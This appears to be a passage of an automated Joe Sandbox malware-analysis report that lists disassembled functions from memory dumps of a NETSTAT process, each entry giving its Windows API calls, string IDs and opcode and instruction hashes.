                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                                            • Opcode ID: ab190458f15fdd29668a23e9374279edfe2e705ef194b44bf2fcaef90eaa7f3d
                                                                                                                                                                            • Instruction ID: 8efc801b82d90b1519514321f694fae507c9e1f71b7412c5bb9ecd4119614392
                                                                                                                                                                            • Opcode Fuzzy Hash: ab190458f15fdd29668a23e9374279edfe2e705ef194b44bf2fcaef90eaa7f3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 13317A7AA006199FDB20DF29DC40BEEB7F8EF4C610F444996E949D7140EB30DA458F60
                                                                                                                                                                            Function 00683B5D Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 246COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 006848A5: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000000,00000000,?,00000000,00000000,?,?,?,006843B7,0000275D,00000000,00000000,?), ref: 006848CA
                                                                                                                                                                              • Part of subcall function 006837EC: htons.WS2_32(?), ref: 0068381C
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,00000001,?,?,00000000,0000274F,?), ref: 00683DF9
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000001,?,?,00000000,0000274F,?), ref: 00683E59
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00683E60
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeLocal$FormatMessagehtons
                                                                                                                                                                            • String ID: o$h
                                                                                                                                                                            • API String ID: 523628632-239820227
                                                                                                                                                                            • Opcode ID: 3b3f33309f9d3d32415f07bc562ea809bfbc1c01426cd73f419bde66124ce319
                                                                                                                                                                            • Instruction ID: d705652040f0e9f91a96cda408ded50309ca308d9ace8ead17456e2f2ebc315b
                                                                                                                                                                            • Opcode Fuzzy Hash: 3b3f33309f9d3d32415f07bc562ea809bfbc1c01426cd73f419bde66124ce319
                                                                                                                                                                            • Instruction Fuzzy Hash: FA81A772D44239AFEB61BB14CC4AFAAB37ADB04B00F100299F50DB6381DA75AF45DB51
                                                                                                                                                                            Function 00685950 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00685E48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00685E4F
                                                                                                                                                                            • __set_app_type.MSVCRT ref: 00685962
                                                                                                                                                                            • __p__fmode.MSVCRT ref: 00685978
                                                                                                                                                                            • __p__commode.MSVCRT ref: 00685986
                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 006859A7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                            • Opcode ID: 8c6d1ac72756bc21d794c263346fbcb8fbe0e4d21b28f8c6496d783b40dbbb68
                                                                                                                                                                            • Instruction ID: 018b0a4c0dcd71aa68d3e62b6dc0f75e25f464e56df66345fa4999f0d7f1e29a
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c6d1ac72756bc21d794c263346fbcb8fbe0e4d21b28f8c6496d783b40dbbb68
                                                                                                                                                                            • Instruction Fuzzy Hash: 96F0F271448B05AFE768BF30EC4E6083B73AB05321BA06B5DE462832F1DF7AC5818B14
                                                                                                                                                                            Function 03187D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                                                            • String ID: +$-
                                                                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                            • Instruction ID: 14018a776edde1b795ad42137fa118ecc29a9ab878b0837f56b78d18b074137f
                                                                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D919471E002159BDB24EF6AC8816BEF7A5AF4C720F78451AE875E72C0D73099818F58
                                                                                                                                                                            Function 03149126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $$@
                                                                                                                                                                            • API String ID: 0-1194432280
                                                                                                                                                                            • Opcode ID: 4ffe7f6417c2c4bbcd6b9f7a8f6bffaa289f7100a9ee5cc0aa45a746b92cca9c
                                                                                                                                                                            • Instruction ID: f01c57a9197b85f317cbd94c1e0bc1474e824ec84ce9daca41b392f58846d180
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ffe7f6417c2c4bbcd6b9f7a8f6bffaa289f7100a9ee5cc0aa45a746b92cca9c
                                                                                                                                                                            • Instruction Fuzzy Hash: F3812875D002699BDB25DB94CC44BEEB7B8AF08710F0445EAE919B7280E7709E85CFA0
                                                                                                                                                                            Function 00684A6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00686139: __iob_func.MSVCRT ref: 0068613E
                                                                                                                                                                            • fprintf.MSVCRT ref: 00684A94
                                                                                                                                                                            • SnmpUtilMemAlloc.SNMPAPI(00000168,?,00000000,000000FF,00000000,?,00681F9B,?,00000000,000000FF), ref: 00684AE1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocSnmpUtil__iob_funcfprintf
                                                                                                                                                                            • String ID: GetTable: type = %d
                                                                                                                                                                            • API String ID: 2435445832-851864366
                                                                                                                                                                            • Opcode ID: b04624e275bf22a46bd0d8dfa9de796257c81d0cecb2c4400ccf6f8382bbe1e8
                                                                                                                                                                            • Instruction ID: 6ef419c034009204f64d443e2a55d88342006a19d0f0adbce2ce5823d82ee671
                                                                                                                                                                            • Opcode Fuzzy Hash: b04624e275bf22a46bd0d8dfa9de796257c81d0cecb2c4400ccf6f8382bbe1e8
                                                                                                                                                                            • Instruction Fuzzy Hash: 8111CB31AC4323EBD725BB089C45B677697DB81750F240316FA066F2C9DEB18C02939A